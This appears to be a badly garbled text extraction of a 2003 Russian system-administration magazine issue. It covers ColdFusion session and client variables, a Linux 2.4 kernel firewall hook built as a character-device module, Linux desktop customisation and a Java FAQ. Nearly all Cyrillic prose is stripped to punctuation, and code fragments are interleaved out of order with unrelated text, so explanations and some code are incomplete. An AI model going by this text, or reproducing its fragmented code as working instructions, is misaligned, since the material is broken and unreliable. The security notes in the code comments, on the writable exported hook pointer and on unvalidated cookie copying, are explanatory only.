Well, hello there, #myName#
</cfoutput>


setMyName.cfm. , -


: Error resolving
parameter MYNAME. ,
web-, ColdFusion

,
!
,
web-,
ColdFusion, HTTP-.
, ,
, ,
. , web,
HTTP-,
,
. HTTP


,
.
ColdFusion-, myName
, .
,
HTTP,
ColdFusion,
.

Application
framework



ColdFusion

application framework () , ().


ColdFusion () , .
Application.cfm.

Session-
Client-
Session- -


( ) .
Session-

ColdFusion .

,
, . Session-
.
Session. ,
Session- , .
Client-

Session , ,

. . Client- cookies
(,

cookies), Windows .
Client- Session- ,
Application.cfm, ( )

. ,


A.
UNIX-.
,
,
, .
Session-,
Client- ColdFusion CFID
CFTOKEN. CFID
, CFTOKEN .
CFID=3
CFTOKEN=54579676. CFID
CFTOKEN Session-. -

cookies
. ColdFusion-, CFID CFTOKEN,
cookies, . ColdFusion
, .
,
/ .
,
cookies , , URL-
FORM-. ,
<cflocation>
ADDTOKEN =
Yes.
Session- / Client- <cfapplication>,
Application.cfm.
c
<cfapplication>:
<cfapplication name = "application_name"
clientManagement = "Yes" or "No"
clientStorage = "datasource_name"
or "Registry" or "Cookie"
setClientCookies = "Yes" or "No"
sessionManagement = "Yes" or "No"
sessionTimeout =
#CreateTimeSpan(days, hours,
minutes, seconds)#
applicationTimeout =
#CreateTimeSpan(days, hours, minutes,
seconds)#
setDomainCookies = "Yes" or "No">

! name ;
! clientManagement -

. Client-. No;
clientStorage
. Client-.
;
setClientCookies
. Yes cookies
.
Yes. No,
ColdFusion CFID
CFTOKEN cookies .

CFID CFTOKEN URL
,

79


Session- Client-;
! sessionManagement
. Yes Session. No;
! sessionTimeout
. Session-
date/time, CreateTimeSpan().
: , ,
,
.
Variables ColdFusion Administrator;
! applicationTimeout .
Application- (
) date/time,
CreateTimeSpan(). : , , , . Variables
ColdFusion Administrator;
! setDomainCookies
. CFID
CFTOKEN cookies , .
No.

Yes , .

<cfapplication>
:
<!--- Application settings for "myBestApplication": session variables are
      enabled and expire after one minute of inactivity
      (CreateTimeSpan(days, hours, minutes, seconds)), client variables are
      off, and CFID/CFTOKEN are handed to the browser as cookies. --->
<cfapplication name="myBestApplication"
               sessionManagement="Yes"
               sessionTimeout="#CreateTimeSpan(0, 0, 1, 0)#"
               clientManagement="No"
               setClientCookies="Yes">

Session- . , cookies
. ,
<cfapplication>
cookies 1 . 1 ,

80

,
.
:
<!--- Re-issue the ColdFusion session identifiers as browser-session cookies.
      A <cfcookie> without an expires attribute produces a cookie the browser
      drops when it closes, whereas the CFID/CFTOKEN cookies ColdFusion sets
      on its own carry a far-future EXPIRES (see the article text).  The
      values are copied back from the incoming request exactly as received;
      only their presence is checked here. --->
<cfif IsDefined("Cookie.CFID") AND IsDefined("Cookie.CFTOKEN")>
	<cfcookie name="CFID" value="#Cookie.CFID#">
	<cfcookie name="CFTOKEN" value="#Cookie.CFTOKEN#">
</cfif>


CFID CFTOKEN cookies,
ColdFusion

Application.cfm, (), ,
EXPIRES. cookies ( MS
IE) , .

( )
cookies
, . ,

, cookies ,
,
.


Session-
Session- , Session-
, ,
, .
(
Session- ) , .
Session- , .
,
ColdFusion . ,
ColdFusion
, ,

,
. -

Session-,
application- server- . Allaire shared scope ( ).
?
ColdFusion ,

. ,

, (multi-threaded applications) . .

,
shared scope.
, ,
ColdFusion-
shared scope-,
.
ColdFusion- . ColdFusion, ,

. <cflock>.
:
! name
,

;
! scope
(shared scopes): session, application
server;
! timeout , ( , <cflock>
);
! throwontimeout (Yes/No), ,

-


timeout.

<cflock>-
<cftry><cfcatch>;
type readonly exclusive.
Readonly .

: -
, , , .
Readonly , shared scope
.
Readonly

Exclusive-. Exclusive
,
,
shared scope-.

Client-
Client- . ,
, Session-
,
Client- :
,
ColdFusion, ODBC
,
cookies .
Client-,
Session-,
CFID
CFTOKEN, Client .
Client-
,
.
.

ODBC , (, ), ColdFusion
native () ODBC ( Access), ColdFusion- ( check

1(2), 2003

box) Client-.

Client
: Client-
Session-, Session-. ,
Client- , Session-, .
:
Client- ,
( ,
).
WDDX-. (WDDX ).
. Session-
,
CreateTimeSpan (days, hours,
minutes, seconds), Client- .
ColdFusion-
,
,
(purge data for clients that
remain unvisited for n days).
Client-,
Session-, cookies CFID CFTOKEN,
cookies EXPIRED, Client .

, cookies

.

. cookies ,
,
.

Brian Kotek, ColdFusion CNET Builder.com


(http://builder.cnet.com/),
custom tag, ClientTimeout.cfm, Client.
:
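<!--- ClientTimeout.cfm (custom tag, after Brian Kotek): decides whether the
      client's previous visit is older than ATTRIBUTES.TimeOut minutes and
      reports the verdict to the calling template in CALLER.TimedOut
      ("Yes" or "No").  CLIENT.CheckLastVisit holds the timestamp of the last
      visit and is refreshed on every call.  Invoked from Application.cfm as
      <cf_ClientTimeout timeout="15">. --->
<!--- Default for the timeout attribute (minutes), matching the example
      invocation, so the tag does not error out when the attribute is omitted. --->
<CFPARAM NAME="ATTRIBUTES.TimeOut" DEFAULT="15">
<!--- First visit of this client: no timestamp stored yet, start the clock now. --->
<CFPARAM NAME="CLIENT.CheckLastVisit" DEFAULT="#CreateODBCDateTime(Now())#">
<!--- DateCompare returns -1 while (now - timeout) is still earlier than the
      last visit, i.e. the client is inside the window.  The datepart must be
      the string "n" (minutes); a bare n is parsed as a variable reference. --->
<CFSET Compare = DateCompare(
		DateAdd("n", (ATTRIBUTES.TimeOut * -1), CreateODBCDateTime(Now())),
		CLIENT.CheckLastVisit)>
<CFIF Compare IS NOT -1>
	<CFSET CALLER.TimedOut = "Yes">
<CFELSE>
	<CFSET CALLER.TimedOut = "No">
</CFIF>
<!--- Record this visit for the next check. --->
<CFSET CLIENT.CheckLastVisit = CreateODBCDateTime(Now())>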



ColdFusion Application.cfm .
<cf_ClientTimeout timeout="15">

timeout ,
,
Client- .
?
Cookies
,

. , cookies
, ,
.
Session- ,
. , Session-

.
,

Client-.

81


,
,
,

,

, ,
.



?




.


1


:
! ;
! -;
! .

, -,
, .
.
IP log-.
. ,
, ( IP). , , . - ,
().

82

-, (
log-).

, IP-.
, .

IP
, ,
IP. ${KERNEL_SRC}/net/ipv4/ip_input.c,
${KERNEL_SRC} .

header-:
/* ip_input.c: pull in the firewall hook declarations (sf_fw_chk and the
 * SF_RC_* / SF_STATE_* constants) only when the kernel was configured with
 * CONFIG_SF_FIREWALL, so an unconfigured build is unaffected. */
# ifdef CONFIG_SF_FIREWALL
# include <linux/sf_kernel.h>
# endif

ip_rcv.


.
:
# ifdef CONFIG_SF_FIREWALL
int err;
# endif

(ip_fast_csum) , :
# ifdef CONFIG_SF_FIREWALL
if ((err=sf_fw_chk(iph,dev,SF_STATE_RECEIVE))!=1)
{
kfree_skb(skb);
return 0;
}
# endif

sf_fw_chk.
. 1, skb, (. <linux/skbuff.h>), ,
.

sf_kernel.h
.
:
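/* sf_kernel.h: interface between the IP receive path and the packet check
 * hook.  Installed into ${KERNEL_SRC}/include/linux. */
#ifndef _LINUX_SF_KERNEL_H
#define _LINUX_SF_KERNEL_H

/* Verdicts returned by the hook. */
#define SF_RC_ACCEPT 1	/* packet is passed on to the stack */
#define SF_RC_BLOCK  0	/* packet is dropped (ip_rcv frees the skb) */

/* Value passed as the third (`opt`) argument when the hook is called
 * from the IP receive path. */
#define SF_STATE_RECEIVE 0

/* Forward declarations so the header can be included on its own. */
struct iphdr;
struct net_device;

/* Built-in stubs: accept everything / block everything. */
extern int sf_fw_chk_pass(struct iphdr *, struct net_device *, int);
extern int sf_fw_chk_block(struct iphdr *, struct net_device *, int);

/* The active hook, called for every received IP packet.  It starts out as
 * sf_fw_chk_pass; a module may replace it.  Note that the pointer itself is
 * writable by any code that can see it. */
extern int (*sf_fw_chk)(struct iphdr *, struct net_device *, int);

#endif /* _LINUX_SF_KERNEL_H */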

sf_fw_chk_pass , sf_fw_chk_block .
(*sf_fw_chk)
,
.
sf_stub.c.
sf_kernel.h ${KERNEL_SRC}/include/linux.

sf_stub.c
, ,
sf_fw_chk_pass, sf_fw_chk_block
(*sf_fw_chk). :

#ifdef CONFIG_SF_FIREWALL
/* The active packet check hook called from ip_rcv().  It is initialised to
 * the pass-through stub; the device module swaps in its own function later. */
int (*sf_fw_chk)(struct iphdr *, struct net_device *, int) = sf_fw_chk_pass;

sf_fw_chk_pass :
/* Default hook body: accept every packet.
 * The arguments match the sf_fw_chk signature and are intentionally unused. */
int sf_fw_chk_pass(struct iphdr *ip, struct net_device *rif, int opt)
{
	(void)ip;
	(void)rif;
	(void)opt;
	return SF_RC_ACCEPT;
}

sf_fw_chk_block :
/* Fail-closed hook body: drop every packet.
 * The arguments match the sf_fw_chk signature and are intentionally unused. */
int sf_fw_chk_block(struct iphdr *ip, struct net_device *rif, int opt)
{
	(void)ip;
	(void)rif;
	(void)opt;
	return SF_RC_BLOCK;
}
#endif /* CONFIG_SF_FIREWALL */

:
! IP- (struct iphdr,
<linux/ip.h>);
! (struct
net_device, <linux/
netdevice.h>);
! IP (int
opt).
sf_stub.c ${KERNEL_SRC}/net/ipv4. Makefile, , obj-y sf_stub.o
ipv4.o.

ksyms.c

,
${KERNEL_SRC}/kernel/ksyms.c.
sf_kernel.h:
/* ksyms.c: bring in the hook declarations so they can be exported below. */
#ifdef CONFIG_SF_FIREWALL
#include <linux/sf_kernel.h>
#endif

:
/* Export the two stubs and the hook pointer so that a loadable module can
 * read and replace sf_fw_chk.  Because the pointer is exported writable,
 * any module that is loaded can repoint it, not only the firewall device. */
#ifdef CONFIG_SF_FIREWALL
EXPORT_SYMBOL(sf_fw_chk_pass);
EXPORT_SYMBOL(sf_fw_chk_block);
EXPORT_SYMBOL(sf_fw_chk);
#endif

config.in
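/* Headers needed by sf_stub.c: kernel config, printk/types, the net_device
 * and iphdr definitions used in the hook signature, and the hook interface. */
#include <linux/config.h>
#include <linux/kernel.h>
#include <linux/netdevice.h>
#include <linux/ip.h>
#include <linux/sf_kernel.h>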

, ,
(*sf_fw_chk) sf_fw_chk_pass,
:

1(2), 2003

${KERNEL_SRC}/arch/i386/config.in
GENERAL SETUP :
bool 'SF_FIREWALL SUPPORT' CONFIG_SF_FIREWALL

83



, GNU/Linux, Linux:
(http://www.programme.ru/archive/2001/8/
082001_1.phtml).
() . :

struct file_operations firewall_fops


(. <linux/fs.h>). , / .
, firewall_fops
:
/* File operations behind the /dev/firewall character device.  Members that
 * are not named here are zero (NULL), i.e. unsupported.  GNU-style labelled
 * initialisers are used because the target toolchain is gcc 2.95. */
struct file_operations firewall_fops = {
	open:    open_firewall,	/* installs the module's check function as the hook */
	read:    read_firewall,	/* hands one struct data_log record to user space */
	write:   write_firewall,	/* receives the struct iphdr used as the block rule */
	release: close_firewall,
};

mknod /dev/firewall c 44 0



:
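/* Headers needed by sf_device.c: module machinery, printk, kmalloc/kfree,
 * the file_operations/chrdev API, net_device and iphdr, the firewall hook
 * interface, and copy_to_user/copy_from_user. */
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/slab.h>
#include <linux/fs.h>
#include <linux/netdevice.h>
#include <linux/types.h>
#include <linux/ip.h>
#include <linux/sf_kernel.h>
#include <asm/uaccess.h>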


open(). :
static int open_firewall(struct inode *inode, struct file
*file)
{

, :
if(MOD_IN_USE) return -EBUSY;

, , :

#define FIREWALL_MAJOR 44 .
if (MINOR(inode->i_rdev) != 0) return -ENODEV;

log-:
/* One log record handed to user space by read_firewall().  The check
 * function fills it in for each packet that reaches the hook; there is a
 * single record (sf_entry_log), allocated with kmalloc when the device is
 * opened, so a packet arriving before the previous record was read
 * overwrites it. */
struct data_log
{
__u32 addr;	/* source address of the checked packet (ip->saddr) */
int action;	/* verdict: 1 = SF_RC_ACCEPT, 0 = SF_RC_BLOCK */
int ready;	/* 1 while an unread record is present; cleared once copied out */
}
*sf_entry_log;

:
! addr IP- ;
! action (1 , 0
);
! ready .



init_module:

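/* Module entry point: registers the "firewall" character device under the
 * fixed major FIREWALL_MAJOR with firewall_fops.
 *
 * Returns 0 on success.  If the major is already taken (or otherwise cannot
 * be registered), logs the failure and returns the negative error from
 * register_chrdev() so insmod reports the real cause. */
int init_module(void)
{
	int err;

	/* With a non-zero major, register_chrdev() yields 0 or a negative errno. */
	err = register_chrdev(FIREWALL_MAJOR, "firewall", &firewall_fops);
	if (err < 0) {
		printk("unable to get major %d for firewall device\n", FIREWALL_MAJOR);
		return err;
	}
	return 0;
}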

,
FIREWALL_MAJOR.


init_module

84

0. ,
.
, . /
:
if ((file->f_mode & 1) != 1) return -EBUSY;

:
sf_entry_log=(struct data_log *)kmalloc(sizeof(struct
data_log),GFP_ATOMIC);
iph=(struct
iphdr
*)kmalloc(sizeof(struct
iphdr),GFP_ATOMIC);


. GFP_ATOMIC
(GFP Get Free Page) ( GFP_KERNEL).
, . , (*sf_fw_chk)
sf_fw_chk_pass, . (*sf_fw_chk) sf_check_packet,
:
sf_fw_chk = sf_check_packet;


sf_check_packet .
:
sf_fw_enabled++;
sf_entry_log->ready=1;

MOD_INC_USE_COUNT;
return 0;


IP- ,
. :
static ssize_t write_firewall(struct file *file, const char
*buf, size_t count, loff_t *ppos)
{

:
count = sizeof(struct iphdr);
return count;
}


log-.
:
static ssize_t read_firewall(struct file *file, char *buf,
size_t count, loff_t *ppos)
{

struct data_log. :
if (count!=sizeof(struct data_log)) return -EINVAL;

:
, , . , .
, IP-. , , , .
. :
if(count!=sizeof(struct iphdr)) return -EINVAL;


. :
int (*sf_fw_chk_save)(struct iphdr *, struct net_device *,
int);

:
sf_fw_chk_save = sf_fw_chk;
sf_fw_chk = sf_fw_chk_block;

:
copy_from_user(iph,buf,sizeof(struct iphdr));

copy_from_user()
. <asm/
uaccess.h>.
:
sf_fw_chk = sf_fw_chk_save;

:
file->f_pos += count;

1(2), 2003

if (sf_fw_enabled<=0) return -ENODEV;


:
copy_to_user(buf,sf_entry_log,sizeof(struct data_log));

struct data_log
sf_check_packet().
:
file->f_pos += count;

.

sf_check_packet() :
sf_entry_log->ready = 0;

:
count = sizeof(struct data_log);
return count;
}

sf_check_packet
, struct data_log
log-.
:
int sf_check_packet(struct iphdr *ip, struct net_device *rif,
int opt)
{

85


.
addr sf_entry_log IP- :


:
sf_fw_chk = sf_fw_chk_pass;

sf_entry_log->addr = ip->saddr;

:
:
if (ip->saddr == iph->saddr) {
sf_entry_log->action = SF_RC_BLOCK;
sf_entry_log->ready = 1;
return SF_RC_BLOCK;
}

IP- , , IP , .
, :

sf_entry_log->ready = 1;
sf_entry_log->action = SF_RC_ACCEPT;
return SF_RC_ACCEPT;


:
static int close_firewall(struct inode *inode, struct file
*file)
{

:
sf_fw_enabled;

:
sf_fw_chk = sf_fw_chk_block;

unregister_chrdev(FIREWALL_MAJOR,"firewall");
return;
}

Makefile
Makefile
:
include make.options

# compiler used for the module
CC = gcc
# object file that makes up the module
module = sf_device.o
# optimisation and warning flags; -fomit-frame-pointer frees a register
CFLAGS = -O2 -Wall -fomit-frame-pointer
# kernel-module defines plus the include path of the configured kernel tree
MODFLAGS = -D__KERNEL__ -DMODULE -I$(LINUX)/include

$(module): sf_device.c
	$(CC) -c $(CFLAGS) $(MODFLAGS) $<

:
! O2 - ;
! Wall (warning all);
! fomit-frame-pointer
(frame pointer) , .
, (frame pointer),
.

:
make.options:
kfree(sf_entry_log);
kfree(iph);

:
MOD_DEC_USE_COUNT;
return 0;
}

# make.options: root of the configured kernel source tree.  The Makefile
# adds $(LINUX)/include to the module's include path via MODFLAGS.
LINUX = /usr/src/linux


make. sf_device.o. insmod:


cleanup_module:

insmod sf_device.o

rmmod:
void cleanup_module(void)
{

, -
:
if(MOD_IN_USE)
{
printk("firewall: busy - remove delayed\n");
return;
}

86

rmmod sf_device


.

GNU/Linux, Slackware 7.1, 2.4.17, gcc-2.95.2.


,
.
, ,
- . ,
.
: , ,
,

.
,
. ,
.

88

.

,

.
,

,

,
.
.
, , . GNU/Linux . , -

, ,
, . ,
,
, , , .

,
,
, .
, Linux ,
,
UNIX,
-


. ,
?

,

. , ,
. , ,
.

1
()
,
,
.
,
. ,

,
, , , ,
,
,
. , , , -

, . ,
,
, ,
.
,
GPL , ,

, -
,

.

1(2), 2003

,
.
, .

, , , ,
, , ,
. , , , 70 Windows XP

- . ,

,
, , www.treasury.ru/~vampiro/
hohma.html.

( , )

. ,
, , .
,
,
,
. Linux
.
, , ,
-,
. ,

. .
, GPL ,
. ,
- ,
, (
, ).

. ,
, ,
Linux ,
.
,
Linux .

2
()
- . Windows 98 ,
,
. , , ,


,
, .
, .
Linux

,
, . , ,

. ,

89


, Linux .
.
, Linux,
(
) , . ,
GPL , .


.
,
.

3
()
,
, . ,
,
ASPLinux
ALTLinux,

Windows 98.
, , .
, ,
.
Linux
. , Windows, ,
(
,

90

, ), Linux .
,

,
50% ,
Debian
. , , Linux Windows,
, , .

,
. , ,

, ,
, .
,
.
, Linux
User Group, , -


.
-.
- ,

, ,
, - ,
24 .
Linux
. , . ,
.
,
-


. .
,

.
, , .
,
Linux .

4
(-)
, , . . ,
, -, .

,
.
, ,
Windows
, . ,
.
. , ,
.
,
Windows- ,


, . . ,
,


Windows , Linux .
, ,
.
, ,

.
, .

Linux.

1 ASPLinux ,


Linux
. Hansa .
,
,
.
-,
, , .

5
(-)
. ,
, , ,
,
. ,
Linux. , Linux
. .

1(2), 2003

, ,
,
,
. , ,
,

. , . ,
.
, , . , , .

,
, , Word, Excel
.
? ,
. ,
? , .
? ,
( )
.
,


.

Open Office,

Gimp, -

Mozilla.

Linux
. ,
.
DOS Turbo Pascal
Linux Free Pascal
Compiler.
fpc.by.ru.
,
,
.

DOS,
Linux .
, , Linux
, Linux .

www.ctc.msiu.ru/materials/books.php.
Linux , .


, ,
. ,
, .
Linux .
. ,

,

Linux.
,

.
,
.
, .

91

LINUX

!

? .

?, .


(),
(
)

92

Microsoft.
176
, () 400
1000
.
,
,
. ,

, ... Microsoft. ,
, ! ,
. ,
, ( 10 000 $).




. .
, ,
, ,

,
, . -
Windows, Word, Excel Access
(), ,
,
. ASPLinux
ASPLinux 7.3 ,
,
FTP- (ftp://ftp.asplinux.ru).
: ,
, , ?
,
,
Windows,
Linux ,
,
, . , : , . . , -
Windows-, Linux :
Windows1
.
,


Windows, . Linux
.

1(2), 2003


:
Linux ?
,
: ASPLinux, Red Hat,
Mandrake Junior
. ,
ASPLinux 7.3.
( ), .
?
:
ASPLinux :
486 . ,
,

Windows,
.
, UNIX-
Windows ,


.
: 433 , 128 RAM 3 HDD ( ), ,

Windows
.

Linux



. ()
root
(
w ). ,
, 1.8 .
gnome
display manager (GDM), ,

kde display manager


(KDM), logon Windows
2000. :
!
Ctrl+Alt+F1, root (
root );
!
rpm e gdm;
! killall gdm.
display manager ,
w, enter
ASPLinux
.
,
,
Windows ,
ASPLinux, . (
Ctrl+Alt+F1,
) mc (midnight commander
norton commander
far). /USR/SHARE/APPS/
KSPLASH/PICS
LOCOLOR
, slash_top.png, ,
c , .
kde .
, Linux

,
,
? :
( k
)
//
. , ok,
/
splash_top.png (), , .
, .
, , , Windows.

93



?
, Linux,
, Windows
? .



, ,
.


K, .
, ,
/usr/share/icons/Crystal/32x32/
apps/kmenu.png. Gimp, ,
2.
/hm/w
(kmenu.png), (
)
.
. K . ,
, Gimp /usr/share/
apps/Crystal/16x16/apps/kmenu.png,
,
.

, :
, ASPLinux 7.3
gnome
KDE, .
.
,
ASPLinux 7.3:

gnome. ,
,
, :
.
, ,
, (-

94

), abiword ( wordpad), , , ,
karm, knotes, kjots, ( ) (kmines).

, , , (

),
, kde
,
.



kde

Windows, , ,
,
KDE : ,

kde 3.0.2. , ,
3
XP:
gimp trashcan
_empty.png trashcan_full. png
/usr/share/icons/crystal/32x32/
filesystems , ,
.
//
(
).
4 ,
,
3,5 a, cd rom
,

(, , )


( ), , .
,
, .

,

,
, /

.

Open
Office.org
Windows .

, ,
/
.

, , , , , .
. ,

ASPLinux - ,
?

:
! , 486,
( );
! pentiumi icewm openoffice.org;
! ( 433
128 RAM ).
2

,
Windows , .
3

,
KDE,
http://artist.kde.org.
4
Konqueror / ,
/
.

FAQ JAVA
:

?
:
. System.identityHashCode(Object x).

x Java. Java
(
Sun). Java, , , . .
, identityHashCode
,
.
,
x, hashCode ,
System.identityHashCode(x) x.hashCode().

:

( Math),
, . ?
:
, -
Java. -, Tools, ,
. ,
- ,
, java.lang.Thread. , -.
.
, Java
java- , .

81655

81656


!
1(2), 2003

95

1(2), , 2003



chief@samag.ru


sekretar@samag.ru


igus@samag.ru


imposer@samag.ru

maker_up@samag.ru

.:(095)928-8253 (. 112)
:(095)928-8253

reklama@samag.ru
103012, . ,
, 13/15
.: (095) 928-8253 (. 112)
: (095) 928-8253
-mail: info@samag.ru
Internet: www.samag.ru

.
- . , . , 3.
5000 .

, (
77-12542 24 2002.)

.
. . .

96

(Windows, Unix
FreeBSD Linux) (
QNX, OS/2, BeOS --).
, ? : , ,
, , , : Windows, Unix
FreeBSD Linux.
,

,

, .

...
ISDN (Integrated Services Digital
Network) () .
,

, .

()
. , .
IDN Integrated Digital Network.


.

, Linux ,
. , -


- , .
dialin.

Milter =
Mail + Filter
Sendmail 8.11.6 ,

. (content filter API , ,
Milter)

.

Cisco

,
Cisco. 1984 , Cisco
. , , .